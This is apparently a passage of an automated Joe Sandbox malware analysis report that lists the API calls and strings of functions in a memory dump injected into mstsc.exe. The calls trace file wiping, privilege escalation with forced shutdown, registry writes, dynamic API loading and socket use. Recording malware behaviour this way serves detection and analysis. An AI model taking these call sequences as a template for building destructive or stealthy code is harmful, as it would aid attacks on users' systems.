Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
Part of subcall function 0006D97F: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1

lstrlenW.KERNEL32(?,00000001,00000000,?), ref: 0006DDE5
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006DDFA
HeapAlloc.KERNEL32(00000000), ref: 0006DDFD
GetProcessHeap.KERNEL32(00000008,?), ref: 0006DE20
HeapAlloc.KERNEL32(00000000), ref: 0006DE23
GetProcessHeap.KERNEL32(00000008,00000250), ref: 0006DE3A
HeapAlloc.KERNEL32(00000000), ref: 0006DE3D
lstrcpyW.KERNEL32(?,00000001), ref: 0006DE55
GetProcessHeap.KERNEL32(00000008,00000009), ref: 0006DE70
HeapAlloc.KERNEL32(00000000), ref: 0006DE73
GetProcessWindowStation.USER32 ref: 0006DE87
lstrcatW.KERNEL32(?,00000000), ref: 0006DEB8
lstrcpyW.KERNEL32(00062247,00000001), ref: 0006DEC4
GetProcessHeap.KERNEL32(00000008,00000015), ref: 0006DEF5
HeapAlloc.KERNEL32(00000000), ref: 0006DEF8
GetOpenClipboardWindow.USER32 ref: 0006DF0C
lstrcatW.KERNEL32(00062247,00000000), ref: 0006DF3D
FindFirstFileW.KERNEL32(00062247,?), ref: 0006DF47
lstrlenW.KERNEL32(79146553), ref: 0006DF7F
lstrcatW.KERNEL32(314C5341,79146553), ref: 0006DFED
GetLastError.KERNEL32 ref: 0006E051

Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000000,314C5341), ref: 0006DF9A
Part of subcall function 0006DDBF: HeapFree.KERNEL32(00000000), ref: 0006DF9D
Part of subcall function 0006DDBF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0006DFAC
Part of subcall function 0006DDBF: HeapAlloc.KERNEL32(00000000), ref: 0006DFAF
Part of subcall function 0006DDBF: lstrcpyW.KERNEL32(00000000,313F5356), ref: 0006DFCA
Part of subcall function 0006DDBF: lstrcatW.KERNEL32(314C5341,?), ref: 0006DFD4
Part of subcall function 0006DDBF: RemoveDirectoryW.KERNEL32(314C5341), ref: 0006E014

DeleteFileW.KERNEL32(314C5341), ref: 0006E01F
FindNextFileW.KERNEL32(sb0aVS,?), ref: 0006E035
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E05D
HeapFree.KERNEL32(00000000), ref: 0006E066
GetProcessHeap.KERNEL32(00000000,?), ref: 0006E06B
HeapFree.KERNEL32(00000000), ref: 0006E06E
GetProcessHeap.KERNEL32(00000000,77043129), ref: 0006E075
HeapFree.KERNEL32(00000000), ref: 0006E078
GetProcessHeap.KERNEL32(00000000,00062247), ref: 0006E082
HeapFree.KERNEL32(00000000), ref: 0006E085
GetProcessHeap.KERNEL32(00000000,?), ref: 0006E091
HeapFree.KERNEL32(00000000), ref: 0006E094
GetProcessHeap.KERNEL32(00000000,?), ref: 0006E0A0
HeapFree.KERNEL32(00000000), ref: 0006E0A3

Strings

0a, xrefs: 0006DEE2
sb0aVS, xrefs: 0006E032
bf>, xrefs: 0006DF12
xSYb, xrefs: 0006DEDB

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006BB40, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 261

APIs

GetProcessHeap.KERNEL32(00000008,00000250,?,7142434B,0007CD20), ref: 0006BB67
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BB70
GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BB86
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BB89
GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BB9D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20,0007CD24), ref: 0006BBA0
GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006BBE4
HeapAlloc.KERNEL32(00000000), ref: 0006BBE7
ReleaseCapture.USER32 ref: 0006BBF9
GetSystemDirectoryW.KERNEL32(0007CD24,00000103), ref: 0006BC4D
FindClose.KERNEL32(?), ref: 0006BDC4

Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0007CD20), ref: 0006F60E
Part of subcall function 0006F5D9: HeapAlloc.KERNEL32(00000000), ref: 0006F611
Part of subcall function 0006F5D9: GetShellWindow.USER32 ref: 0006F62D
Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006F678
Part of subcall function 0006F5D9: HeapAlloc.KERNEL32(00000000), ref: 0006F67B
Part of subcall function 0006F5D9: GetLogicalDrives.KERNEL32 ref: 0006F68F
Part of subcall function 0006F5D9: GetModuleHandleA.KERNEL32(0006BF20,00000000), ref: 0006F6B9
Part of subcall function 0006F5D9: GetProcAddress.KERNEL32(00000000), ref: 0006F6C0
Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006F6D0
Part of subcall function 0006F5D9: HeapFree.KERNEL32(00000000), ref: 0006F6DD
Part of subcall function 0006F5D9: GetProcessHeap.KERNEL32(00000000,0006BF20), ref: 0006F6E2
Part of subcall function 0006F5D9: HeapFree.KERNEL32(00000000), ref: 0006F6E9

lstrcatW.KERNEL32(0007CD24,00000000), ref: 0006BC84
FindFirstFileW.KERNEL32(0007CD24,?), ref: 0006BC8E
StrRChrW.SHLWAPI(?,00000000,0000002E), ref: 0006BCD3
FindNextFileW.KERNEL32(?,?), ref: 0006BD84
FindFirstFileW.KERNEL32(0007CD24,?), ref: 0006BD90
GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0006BDDB
HeapFree.KERNEL32(00000000), ref: 0006BDDE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006BDE8
HeapFree.KERNEL32(00000000), ref: 0006BDEB
GetProcessHeap.KERNEL32(00000000,0007CD24,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BDFA
HeapFree.KERNEL32(00000000), ref: 0006BDFD
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0006BF42,?,0007CD20), ref: 0006BE07
HeapFree.KERNEL32(00000000), ref: 0006BE0A

Strings

:PEU, xrefs: 0006BBAF
fPoU, xrefs: 0006BBD7

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006C5E5, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 105

APIs

WSAStartup.WS2_32(00000202,?), ref: 0006C600
socket.WS2_32(00000002,00000001,00000000), ref: 0006C60D
GetCurrentProcessId.KERNEL32 ref: 0006C622
GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0006C675
HeapAlloc.KERNEL32(00000000), ref: 0006C67C
GetProcessWindowStation.USER32 ref: 0006C692
inet_addr.WS2_32(00000000), ref: 0006C6C1
htons.WS2_32(?), ref: 0006C6CC
bind.WS2_32(?,?,00000010), ref: 0006C6E7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C6F4
HeapFree.KERNEL32(00000000), ref: 0006C6FB
closesocket.WS2_32(?), ref: 0006C717
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006C720
HeapFree.KERNEL32(00000000), ref: 0006C727

Strings

knCD, xrefs: 0006C6A9
61, xrefs: 0006C66A
Z\tj61knCD, xrefs: 0006C686

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00061D22, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85

APIs

GetProcessHeap.KERNEL32(00000008,00000015), ref: 00061D6F
HeapAlloc.KERNEL32(00000000), ref: 00061D72
GetMenuCheckMarkDimensions.USER32 ref: 00061D83
GetCurrentProcess.KERNEL32(00000028,?), ref: 00061DAE
OpenProcessToken.ADVAPI32(00000000), ref: 00061DB5
LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 00061DC3
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00061DE2
ExitWindowsEx.USER32(00000006,00000000), ref: 00061DF1
ExitWindowsEx.USER32(00000004,00000000), ref: 00061E01
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061E06
HeapFree.KERNEL32(00000000), ref: 00061E09

Strings

!, xrefs: 00061D46
vniVk, xrefs: 00061D99
3k, xrefs: 00061D5E

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006468D, Relevance: 10.6, APIs: 7, Instructions: 71

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 000646A6
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?), ref: 000646DA
GetCurrentProcess.KERNEL32(00000028,?), ref: 000646EA
OpenProcessToken.ADVAPI32(00000000), ref: 000646F1
LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 00064701
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000,?,?), ref: 00064731
CloseHandle.KERNEL32(?), ref: 0006473C

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000680D2, Relevance: 94.8, APIs: 45, Strings: 9, Instructions: 317

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,00000001,00000000,00000005), ref: 00068119
HeapAlloc.KERNEL32(00000000), ref: 0006811C
GetShellWindow.USER32 ref: 00068138
GetProcessHeap.KERNEL32(00000008,00000014), ref: 00068197
HeapAlloc.KERNEL32(00000000), ref: 0006819A
CreatePopupMenu.USER32 ref: 000681B6

Part of subcall function 000685E0: VirtualAlloc.KERNEL32(00000000,000681EC,00003000,00000004,00000000,00000008,76E6FE8D), ref: 0006861B
Part of subcall function 000685E0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 00068696

GetProcessHeap.KERNEL32(00000000,00000000), ref: 000681FE
HeapFree.KERNEL32(00000000), ref: 00068207
GetProcessHeap.KERNEL32(00000000,00000008), ref: 0006820C
HeapFree.KERNEL32(00000000), ref: 0006820F
GetProcessHeap.KERNEL32(00000008,00000014), ref: 00068252
HeapAlloc.KERNEL32(00000000), ref: 00068255
CountClipboardFormats.USER32 ref: 0006826A
GetProcessHeap.KERNEL32(00000000,0000000B), ref: 000682B8
HeapFree.KERNEL32(00000000), ref: 000682C1
GetProcessHeap.KERNEL32(00000000,?), ref: 000682CC
HeapFree.KERNEL32(00000000), ref: 000682CF
GetProcessHeap.KERNEL32(00000000,00000008), ref: 000682D4
HeapFree.KERNEL32(00000000), ref: 000682D7
GetProcessHeap.KERNEL32(00000008,00000014), ref: 00068317
HeapAlloc.KERNEL32(00000000), ref: 0006831A
GetMessageExtraInfo.USER32 ref: 0006832F
GetProcessHeap.KERNEL32(00000000,?), ref: 0006837D
HeapFree.KERNEL32(00000000), ref: 00068386
GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0006838D
GetProcessHeap.KERNEL32(00000008,00000016), ref: 000683D7
HeapAlloc.KERNEL32(00000000), ref: 000683DA
GetLastError.KERNEL32 ref: 000683EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068435
HeapFree.KERNEL32(00000000), ref: 0006843E
GetProcessHeap.KERNEL32(00000000,?), ref: 00068445
HeapFree.KERNEL32(00000000), ref: 00068448
GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0006844F
HeapFree.KERNEL32(00000000), ref: 00068452
GetProcessHeap.KERNEL32(00000000,?), ref: 00068459
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068460
HeapFree.KERNEL32(00000000), ref: 00068469
GetProcessHeap.KERNEL32(00000000,?), ref: 00068470
HeapFree.KERNEL32(00000000), ref: 00068473
GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0006847A
HeapFree.KERNEL32(00000000), ref: 0006847D
GetProcessHeap.KERNEL32(00000000,?), ref: 00068484
HeapFree.KERNEL32(00000000), ref: 00068487
GetProcessHeap.KERNEL32(00000000,00000008), ref: 0006848C
HeapFree.KERNEL32(00000000), ref: 0006848F

Strings

~*75, xrefs: 000683B6
,=P<, xrefs: 000683A8
P1, xrefs: 000683D1
!$X#, xrefs: 000683BD
29'', xrefs: 000683AF
LdPB, xrefs: 000683CA
[##', xrefs: 000680FA
P, xrefs: 000683C4
5WGK5, xrefs: 0006814E

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00068BB1, Relevance: 75.5, APIs: 38, Strings: 5, Instructions: 272

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00068C1A
HeapAlloc.KERNEL32(00000000), ref: 00068C1D
GetShellWindow.USER32 ref: 00068C38
GetModuleHandleA.KERNEL32(00000000), ref: 00068C5E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068C74
HeapFree.KERNEL32(00000000), ref: 00068C77
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00068CB0
HeapAlloc.KERNEL32(00000000), ref: 00068CB3
GetMessagePos.USER32 ref: 00068CD1

Part of subcall function 000677D7: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00067861
Part of subcall function 000677D7: SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00068D00), ref: 00067876
Part of subcall function 000677D7: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0006788E
Part of subcall function 000677D7: CloseHandle.KERNEL32(00000000), ref: 000678A7
Part of subcall function 000677D7: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000001,?,?,?,?,00068D00), ref: 000678C0
Part of subcall function 000677D7: HeapFree.KERNEL32(00000000), ref: 000678C7

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068D1C
HeapFree.KERNEL32(00000000), ref: 00068D25
GetProcessHeap.KERNEL32(00000000,?), ref: 00068D2A
HeapFree.KERNEL32(00000000), ref: 00068D2D
GetProcessHeap.KERNEL32(00000008,00000018), ref: 00068D70
HeapAlloc.KERNEL32(00000000), ref: 00068D73
GetCaretBlinkTime.USER32 ref: 00068D8A
GetProcessHeap.KERNEL32(00000000,?), ref: 00068DDA
HeapFree.KERNEL32(00000000), ref: 00068DE3
GetProcessHeap.KERNEL32(00000000,?), ref: 00068DEE
HeapFree.KERNEL32(00000000), ref: 00068DF1
GetProcessHeap.KERNEL32(00000000,?), ref: 00068DF6
HeapFree.KERNEL32(00000000), ref: 00068DF9
GetProcessHeap.KERNEL32(00000008,00000018), ref: 00068E3E
HeapAlloc.KERNEL32(00000000), ref: 00068E41
GetCapture.USER32 ref: 00068E55
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068EA0
HeapFree.KERNEL32(00000000), ref: 00068EA9
GetProcessHeap.KERNEL32(00000000,?), ref: 00068EB0
HeapFree.KERNEL32(00000000), ref: 00068EB3
GetProcessHeap.KERNEL32(00000000,?), ref: 00068EBA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068EC5
HeapFree.KERNEL32(00000000), ref: 00068ECE
GetProcessHeap.KERNEL32(00000000,?), ref: 00068ED5
HeapFree.KERNEL32(00000000), ref: 00068ED8
GetProcessHeap.KERNEL32(00000000,?), ref: 00068EDF
HeapFree.KERNEL32(00000000), ref: 00068EE2
GetProcessHeap.KERNEL32(00000000,?), ref: 00068EE7
HeapFree.KERNEL32(00000000), ref: 00068EEA

Strings

ISoc2x, xrefs: 00068CE7
B;^1, xrefs: 00068E12
5WGK5, xrefs: 00068C4E
[##', xrefs: 00068BFB
7, xrefs: 00068E2D

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006110C, Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 305

APIs

GetProcessHeap.KERNEL32(00000008,0000003D,00000000,76E6FE8D,00000000), ref: 00061176
HeapAlloc.KERNEL32(00000000), ref: 00061179
CountClipboardFormats.USER32 ref: 0006119F
GetProcessHeap.KERNEL32(00000008,000000C1), ref: 000612C8
HeapAlloc.KERNEL32(00000000), ref: 000612CB
GetDialogBaseUnits.USER32 ref: 000612EA

Part of subcall function 000638F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0006131B,00000000,0006131B,00000000,00000001,?,0006131B,00020006), ref: 00063929
Part of subcall function 000638F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0006131B,0006131B,?,0006131B,00020006), ref: 0006393C

GetProcessHeap.KERNEL32(00000008,00000019,00020006), ref: 00061356
HeapAlloc.KERNEL32(00000000), ref: 00061359
GetDialogBaseUnits.USER32 ref: 00061372
GetProcessHeap.KERNEL32(00000008,00000019), ref: 000613C4
HeapAlloc.KERNEL32(00000000), ref: 000613C7
GetCurrentThreadId.KERNEL32 ref: 000613E0
GetProcessHeap.KERNEL32(00000008,00000025), ref: 0006143F
HeapAlloc.KERNEL32(00000000), ref: 00061442
ReleaseCapture.USER32 ref: 00061458
RegSetValueExW.ADVAPI32(00000006,?,00000000,00000004,00000001,00000004), ref: 0006149A
RegSetValueExW.ADVAPI32(00000006,774C5173,00000000,00000001,?,?), ref: 000614CE
RegSetValueExW.ADVAPI32(00000006,00000000,00000000,00000001,?,?), ref: 00061500
RegCloseKey.ADVAPI32(00000006), ref: 00061505
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00061515
HeapFree.KERNEL32(00000000), ref: 0006151E
GetProcessHeap.KERNEL32(00000000,774C5173), ref: 00061524
HeapFree.KERNEL32(00000000), ref: 00061527
GetProcessHeap.KERNEL32(00000000,?), ref: 0006152D
HeapFree.KERNEL32(00000000), ref: 00061530
GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00061542
HeapFree.KERNEL32(00000000), ref: 0006154B
GetProcessHeap.KERNEL32(00000000,?), ref: 00061551
HeapFree.KERNEL32(00000000), ref: 00061554

Strings

0Q#w, xrefs: 00061336
X!a1, xrefs: 00061256
/Quf, xrefs: 00061427
:N, xrefs: 000613E6
foAQ, xrefs: 00061434
8Do, xrefs: 00061420
VJ(, xrefs: 00061378
RX#, xrefs: 00061248
R6X-, xrefs: 000612A2
sQLw, xrefs: 0006134B
5o$Q, xrefs: 00061412

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000641E5, Relevance: 70.3, APIs: 32, Strings: 8, Instructions: 269

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,00106D80), ref: 00064237
HeapAlloc.KERNEL32(00000000), ref: 0006423A
GetShellWindow.USER32 ref: 00064255
GetProcessHeap.KERNEL32(00000008,0000000F), ref: 000642AC
HeapAlloc.KERNEL32(00000000), ref: 000642AF
GetDoubleClickTime.USER32 ref: 000642CD
LoadLibraryA.KERNEL32(?), ref: 000642F7
GetProcAddress.KERNEL32(00000000), ref: 000642FE
GetProcessHeap.KERNEL32(00000008,00000014), ref: 00064376
HeapAlloc.KERNEL32(00000000), ref: 00064379
GetDialogBaseUnits.USER32 ref: 00064390
LoadLibraryA.KERNEL32(?), ref: 000643BA
GetProcAddress.KERNEL32(00000000), ref: 000643C1
GetProcessHeap.KERNEL32(00000008,00000019), ref: 00064419
HeapAlloc.KERNEL32(00000000), ref: 0006441C
CloseClipboard.USER32 ref: 00064433
LoadLibraryA.KERNEL32(?), ref: 0006445D
GetProcAddress.KERNEL32(00000000), ref: 00064464
GetProcessHeap.KERNEL32(00000008,00061A39), ref: 00064487
HeapAlloc.KERNEL32(00000000), ref: 0006448A
GetProcessHeap.KERNEL32(00000000,00000005), ref: 000644C8
HeapFree.KERNEL32(00000000), ref: 000644CB
CloseHandle.KERNEL32(?), ref: 000644D4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000644DD
HeapFree.KERNEL32(00000000), ref: 000644E0
CloseHandle.KERNEL32(?), ref: 000644EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000644F5
HeapFree.KERNEL32(00000000), ref: 000644F8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064504
HeapFree.KERNEL32(00000000), ref: 0006450D
GetProcessHeap.KERNEL32(00000000,?), ref: 00064512
HeapFree.KERNEL32(00000000), ref: 00064515

Strings

,@a,, xrefs: 000643E4
X^_, xrefs: 00064400
v70Y, xrefs: 0006440E
W3h4, xrefs: 0006436B
D'D, xrefs: 00064344
[72@, xrefs: 00064352
5WGK, xrefs: 0006422C
[##', xrefs: 00064218

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 00068F05, Relevance: 70.3, APIs: 35, Strings: 5, Instructions: 265

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00068F71
HeapAlloc.KERNEL32(00000000), ref: 00068F74
GetShellWindow.USER32 ref: 00068F8F
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00068FE5
HeapAlloc.KERNEL32(00000000), ref: 00068FE8
GetMessagePos.USER32 ref: 00069006

Part of subcall function 000685E0: VirtualAlloc.KERNEL32(00000000,000681EC,00003000,00000004,00000000,00000008,76E6FE8D), ref: 0006861B
Part of subcall function 000685E0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,000681EC,00000000), ref: 00068696

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00069052
HeapFree.KERNEL32(00000000), ref: 0006905B
GetProcessHeap.KERNEL32(00000000,?), ref: 00069060
HeapFree.KERNEL32(00000000), ref: 00069063
GetProcessHeap.KERNEL32(00000008,00000018), ref: 000690A9
HeapAlloc.KERNEL32(00000000), ref: 000690AC
GetCaretBlinkTime.USER32 ref: 000690C3
GetProcessHeap.KERNEL32(00000000,?), ref: 00069114
HeapFree.KERNEL32(00000000), ref: 0006911D
GetProcessHeap.KERNEL32(00000000,?), ref: 00069128
HeapFree.KERNEL32(00000000), ref: 0006912B
GetProcessHeap.KERNEL32(00000000,?), ref: 00069130
HeapFree.KERNEL32(00000000), ref: 00069133
GetProcessHeap.KERNEL32(00000008,00000018), ref: 00069178
HeapAlloc.KERNEL32(00000000), ref: 0006917B
GetCapture.USER32 ref: 0006918F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000691DB
HeapFree.KERNEL32(00000000), ref: 000691E4
GetProcessHeap.KERNEL32(00000000,?), ref: 000691EB
HeapFree.KERNEL32(00000000), ref: 000691EE
GetProcessHeap.KERNEL32(00000000,?), ref: 000691F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00069200
HeapFree.KERNEL32(00000000), ref: 00069209
GetProcessHeap.KERNEL32(00000000,?), ref: 00069210
HeapFree.KERNEL32(00000000), ref: 00069213
GetProcessHeap.KERNEL32(00000000,?), ref: 0006921A
HeapFree.KERNEL32(00000000), ref: 0006921D
GetProcessHeap.KERNEL32(00000000,?), ref: 00069222
HeapFree.KERNEL32(00000000), ref: 00069225

Strings

7, xrefs: 00069167
B;^1, xrefs: 0006914C
5WGK5, xrefs: 00068FA5
[##', xrefs: 00068F52
ISoc2x, xrefs: 0006901C

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 000664D2, Relevance: 65.0, APIs: 29, Strings: 8, Instructions: 258

APIs

OpenProcess.KERNEL32(02000000,00000000), ref: 00066529
ProcessIdToSessionId.KERNEL32(?,?), ref: 00066541
OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 0006655F

Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000018), ref: 00064EA7
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00064EAA
Part of subcall function 00064E4E: GetLastError.KERNEL32 ref: 00064EC8
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001F), ref: 00064F61
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00064F64
Part of subcall function 00064E4E: GetTickCount.KERNEL32 ref: 00064F7E
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 00064FF4
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00064FF7
Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 00065011
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 00065099
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 0006509C
Part of subcall function 00064E4E: GetTickCount.KERNEL32 ref: 000650B6
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0006513F
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065142
Part of subcall function 00064E4E: GetMessageExtraInfo.USER32 ref: 0006515C
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 000651E4
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000651E7
Part of subcall function 00064E4E: GetCapture.USER32 ref: 00065201
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000010), ref: 0006526F
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065272
Part of subcall function 00064E4E: GetLogicalDrives.KERNEL32 ref: 0006528C
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 000652FE
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065301
Part of subcall function 00064E4E: GetMessagePos.USER32 ref: 0006531B
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 00065398
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 0006539B
Part of subcall function 00064E4E: GetTickCount.KERNEL32 ref: 000653B5
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 0006542D
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065430
Part of subcall function 00064E4E: GetOpenClipboardWindow.USER32 ref: 0006544A
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 000654C5
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000654C8
Part of subcall function 00064E4E: DestroyCaret.USER32 ref: 000654E2
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000017), ref: 00065563
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065566
Part of subcall function 00064E4E: GetCursor.USER32 ref: 00065580
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 00065611
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065614
Part of subcall function 00064E4E: GetInputState.USER32 ref: 0006562E
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000021), ref: 000656B2
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000656B5
Part of subcall function 00064E4E: GetMessageExtraInfo.USER32 ref: 000656CC
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001B), ref: 00065758
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 0006575B
Part of subcall function 00064E4E: IsSystemResumeAutomatic.KERNEL32 ref: 00065775
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 000657F0
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 000657F3
Part of subcall function 00064E4E: CountClipboardFormats.USER32 ref: 0006580D
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000013), ref: 00065879
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 0006587C
Part of subcall function 00064E4E: GetCurrentProcessId.KERNEL32 ref: 00065893
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000014), ref: 00065906
Part of subcall function 00064E4E: HeapAlloc.KERNEL32(00000000), ref: 00065909
Part of subcall function 00064E4E: GetDesktopWindow.USER32 ref: 00065923
Part of subcall function 00064E4E: GetProcessHeap.KERNEL32(00000008,00000015), ref: 000659A5
